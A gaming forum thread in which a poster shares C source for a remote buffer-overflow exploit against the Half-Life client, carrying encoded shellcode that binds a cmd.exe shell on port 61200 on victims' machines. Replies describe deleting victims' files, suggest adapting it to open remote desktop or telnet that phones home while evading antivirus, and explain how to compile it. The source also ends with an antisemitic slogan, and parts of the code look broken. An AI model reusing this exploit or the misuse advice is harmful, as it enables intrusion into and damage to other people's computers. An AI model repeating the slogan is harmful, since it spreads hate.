Jump to content

1.1.1.0 CMD.exe exploit.

Von-Doitch
Von-Doitch
in General Discussion

Featured Replies

Posted

Today I have just found a exploit on the client side to access there cmd.exe shell on port 61200.

 

If anyone wants the source code. Just reply Yes. and I will post on this thred

  • Author

/*

* Aaron Von Doitch

* HalfLife client <=v.1.1.1.0 remote exploit

*

* binds cmd.exe shell on port 61200

*

* Avaiable targets:

* 1. win2k sp3 en

* 2. winxp nosp ru

* 3. winxp sp1 ru

* 4. win98 se2 (u need change shellcode)

*/

 

 

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <arpa/inet.h>

#include <netdb.h>

 

#define PORT 27015

 

char ping[0x12]=

"\xff\xff\xff\xff\x6a\x00\x20\x20\x20"

"\x20\x20\x20\x20\x20\x20\x20\x20\x20";

 

unsigned char evilbuf[] =

/* header of HalfLife udp-datagram | do not edit */

"\xFF\xFF\xFF\xFF\x69\x6E\x66\x6F\x73\x74\x72\x69"

"\x6E\x67\x72\x65\x73\x70\x6F\x6E\x73\x65\x00\x5c"

/* 512 bytes for bof */

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

"AAAAAAAAAAAAAAAAAAAAAA"

"\x5a\x5a\x5a\x5a" // EIP

"\x90\x90\x90\x90" // payload for esp

/* winxp/2k xored portbind shellcode */

/* If u want to use this xsploit against win9x/ME, change shellcode to another one */

"\x8B\xC4\x83\xC0\x15\x33\xC9\x66\xB9\xD1\x01\x80\x30\x96\x40\xE2\xFA" // decrypt

"\x15\x7A\xA2\x1D\x62\x7E\xD1\x97\x96\x96\x1F\x90\x69\xA0\xFE\x18\xD8\x98\x7A\x7E\xF7"

"\x97\x96\x96\x1F\xD0\x9E\x69\xA0\xFE\x3B\x4F\x93\x58\x7E\xC4\x97\x96\x96\x1F\xD0"

"\x9A\xFE\xFA\xFA\x96\x96\xFE\xA5\xA4\xB8\xF2\xFE\xE1\xE5\xA4\xC9\xC2\x69\xC0\x9E"

"\x1F\xD0\x92\x69\xA0\xFE\xE4\x68\x25\x80\x7E\xBB\x97\x96\x96\x1F\xD0\x86\x69\xA0"

"\xFE\xE8\x4E\x74\xE5\x7E\x88\x97\x96\x96\x1F\xD0\x82\x69\xE0\x92\xFE\x5D\x7B\x6A"

"\xAD\x7E\x98\x97\x96\x96\x1F\xD0\x8E\x69\xE0\x92\xFE\x4F\x9F\x63\x3B\x7E\x68\x96"

"\x96\x96\x1F\xD0\x8A\x69\xE0\x92\xFE\x32\x8C\xE6\x51\x7E\x78\x96\x96\x96\x1F\xD0"

"\xB6\x69\xE0\x92\xFE\x32\x3B\xB8\x7F\x7E\x48\x96\x96\x96\x1F\xD0\xB2\x69\xE0\x92"

"\xFE\x73\xDF\x10\xDF\x7E\x58\x96\x96\x96\x1F\xD0\xBE\x69\xE0\x92\xFE\x71\xEF\x50"

"\xEF\x7E\x28\x96\x96\x96\x1F\xD0\xBA\xA5\x69\x17\x7A\x06\x97\x96\x96\xC2\xFE\x97"

"\x97\x96\x96\x69\xC0\x8E\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6\x69\xC0\x8A\x1D\x4E\xC1"

"\xC1\xFE\x94\x96\x79\x86\x1D\x5A\xFC\x80\xC7\xC5\x69\xC0\xB6\xC1\xC5\x69\xC0\xB2"

"\xC1\xC7\xC5\x69\xC0\xBE\x1D\x46\xFE\xF3\xEE\xF3\x96\xFE\xF5\xFB\xF2\xB8\x1F\xF0"

"\xA6\x15\x7A\xC2\x1B\xAA\xB2\xA5\x56\xA5\x5F\x15\x57\x83\x3D\x74\x6B\x50\xD2\xB2"

"\x86\xD2\x68\xD2\xB2\xAB\x1F\xC2\xB2\xDE\x1F\xC2\xB2\xDA\x1F\xC2\xB2\xC6\x1B\xD2"

"\xB2\x86\xC2\xC6\xC7\xC7\xC7\xFC\x97\xC7\xC7\x69\xE0\xA6\xC7\x69\xC0\x86\x1D\x5A"

"\xFC\x69\x69\xA7\x69\xC0\x9A\x1D\x5E\xC1\x69\xC0\xBA\x69\xC0\x82\xC3\xC0\xF2\x37"

"\xA6\x96\x96\x96\x13\x56\xEE\x9A\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\x7D\x9F"

"\x1D\xD6\xA2\x1D\x3E\x2E\x96\x96\x96\x1D\x53\xC8\xCB\x54\x92\x96\xC5\xC3\xC0\xC1"

"\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D\xDC\x8E\x1D\xCC\xB6\x95"

"\x4B\x75\xA4\xDF\x1D\xA2\x1D\x95\x63\xA5\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x91\x57"

"\x59\x9B\x95\x6E\x7D\x64\xAD\xEA\xB2\x82\xE3\x77\x1D\xCC\xB2\x95\x4B\xF0\x1D\x9A"

"\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x94\xA5\x56\x1D\x43\xC9\xC8\xCB"

"\xCD\x54\x92\x96"

/* end */

"\x5C\x00"; // end of udp-HL-datagram. Do not change!

 

char retw2ksp3[] = "\xc5\xaf\xe2\x77";

char retwxpsp0[] = "\x1c\x80\xf5\x77"; // ntdll.dll :: jmp esp

char retwxpsp1[] = "\xba\x26\xe6\x77";

char retw98se2[] = "\xa9\xbf\xda\x7f";

 

int main(int argc, char **argv) {

int sock, sf, len, i;

u_short port=PORT;

struct sockaddr_in fukin_addr, rt;

char buf[0x1000];

printf("\n\rHalfLife client v.1.1.1.0 remote exploit by m00 Security\n");

if(argc!=2) {

printf("

Usage: %s <remote_os>

 

where os:

1 - win2k sp3 ru

2 - winxp nosp ru

3 - winxp sp1 ru

4 - win98 se2 ru (need another shellcode)

 

",argv[0]);

exit(0);

}

if(atoi(argv[1])==1) {

for(i=0;i<4;i++) {

evilbuf[536+i]=retw2ksp3;

}

}

if(atoi(argv[1])==2) {

for(i=0;i<4;i++) {

evilbuf[536+i]=retwxpsp0;

}

}

if(atoi(argv[1])==3) {

for(i=0;i<4;i++) {

evilbuf[536+i]=retwxpsp1;

}

}

if(atoi(argv[1])==4) {

for(i=0;i<4;i++) {

evilbuf[536+i]=retw98se2;

}

}

 

if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {

perror("[-] socket()");

exit(0);

}

printf("\n[+] Socket created.\n");

fukin_addr.sin_addr.s_addr = INADDR_ANY;

fukin_addr.sin_port = htons(port);

fukin_addr.sin_family = AF_INET;

 

if(bind(sock, (struct sockaddr *)&fukin_addr, sizeof(fukin_addr))<0) {

perror("[-] bind()");

exit(0);

}

printf("[+] Port %i binded.\n", port);

sf = sizeof(rt);

while(1) {

if ((len = recvfrom(sock, buf, sizeof(buf), 0, (struct sockaddr *)&rt, &sf))<0) {

perror("[-] recv()");

exit(1);

}

printf("[+] Incoming udp datagram: ");

for (i=0;i<=len;i++){

printf("%c",buf);

}

printf("\n[~] Identyfication... ");

if(strstr(buf,"ping")) {

printf("PING request\n[~] Sending answer... ");

if(sendto(sock, ping, sizeof(ping), 0, (struct sockaddr *)&rt, sizeof(rt))<0) {

perror("[-] send()");

exit(1);

} else {

printf("OK\n");

}

continue;

}

if(strstr(buf,"infostring")) {

printf("INFOSTRING request\n[~] Attacking... OK\n");

printf("[+] Now try to connect to: %s:61200\n", inet_ntoa(rt.sin_addr));

if(sendto(sock, evilbuf, sizeof(evilbuf), 0, (struct sockaddr *)&rt, sizeof(rt))<0) {

perror("[-] send()");

exit(1);

}

continue;

}

printf("unknow request\n");

}

close(sock);

return 0;

}

// Nuke die juden!

Today I have just found a exploit on the client side to access there cmd.exe shell on port 61200.

 

If anyone wants the source code. Just reply Yes. and I will post on this thred

 

what exactly does this enable you to do? Plz explain in simple english

cmd is command prompt

if you can access it, you have access to their whole computer.

lol means you can deltree

depends on setup snakeyes...most default XP setups, cmd.exe only sees the drive winroot is on (only sees the drive the actual OS is installed on, so if they are partitioned a:\(floppy), c:\, d:\, e:\(cd), f:\(dvd) with windows installed on D:\, all you MAY see is the D:\ drive, with the possible ability to run objects found on a:\...it may not allow you to cd c:\, or to access the cd/dvd drives.

 

but, since it's at winroot, you can still deltree and shit :)

 

 

for those unused to command line XP...default dir when cmd starts is %winroot%\documents and settings\username of user logged on....so don't forget to cd.. twice to get to root before you start hunting for stuff...

Since I don't know how to do this can someone tell me where this goes and how do I get it to work (maybe with a program?). Kthx
  • Author
I will need some time cuz im in iraq doing millitary work. so give me some time to find the other missing files
I will need some time cuz im in iraq doing millitary work. so give me some time to find the other missing files

 

crazy.

i dunno what kind of military work you are doing with counter strike
  • Author
i dunno what kind of military work you are doing with counter strike

 

I think I didnt clairafi. But that exploit was made in spare time (R&R) when I was bored... Im sick of making weapions systems upgrades on spare time. So I said "Hell, why not make a exploit.. lol".

 

Im at work for 15/h non-stop so when I get my 9 hours of personal, I like to have fun with it. Well, I got to get to my station now, so more about finding the other files later.

hmmm..."making an exploit"...don't you mean "finding"?

 

and you aren't the first one to find this one...it was first uncovered with the adminmod psay/vsay text jump exploit, which allowed you to spawn a rogue telnet shell on whichever port you directed it to...the psay/vsay exploit uncovered the fact that the HL engine textline "drops" certain text from "printing", and instead, runs it as code or commands on the client machine.

 

Basically, this exploit can be used to open any native program, shell, or service inherent in the OS on the client machine...you just have to figure out correct char defs to cause it.

 

technically, you could recode this to open any service yo8u wanted...you could even...say...have it open remote desktop sharing and a telnet server, and arrange a method for it to contact you (or whoever) itself anytime it's online.

 

The real advantage to this kind of exploit is the fact that since it opens native services, it'll never trigger any sort of antivirus alert.

you don't "get" an exploit, dude...you learn how to use it...it's already there.

 

he left the code for actually taking advantage of the text jump exploit to open cmd shell on his second post in the thread...copy the code, paste it to a text document, then open the document in linux or UNIX default c++ compiler, and compile

 

either that or hunt up the GNU libraries that are conveniently omitted from VS or VS.NET lists, and then compile it in visual studio or visual c++

 

it's simpler to just install a small linux partition, and compile it there, though.

woah shit. my compiler went crazy.

 

makong@censored makong $ gcc ~/rpcdcom1.c

/home/makong/rpcdcom1.c:54:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:55:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:56:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:57:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:58:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:59:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:60:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:61:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:62:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:63:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:64:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:65:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:66:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:67:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:68:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:69:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:70:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:71:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:72:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:73:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:74:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:75:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:76:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:77:1: \x used with no following hex digits

/home/makong/rpcdcom1.c:94:8: warning: multi-line string literals are deprecated

Guest
This topic is now closed to further replies.
Go to topic listing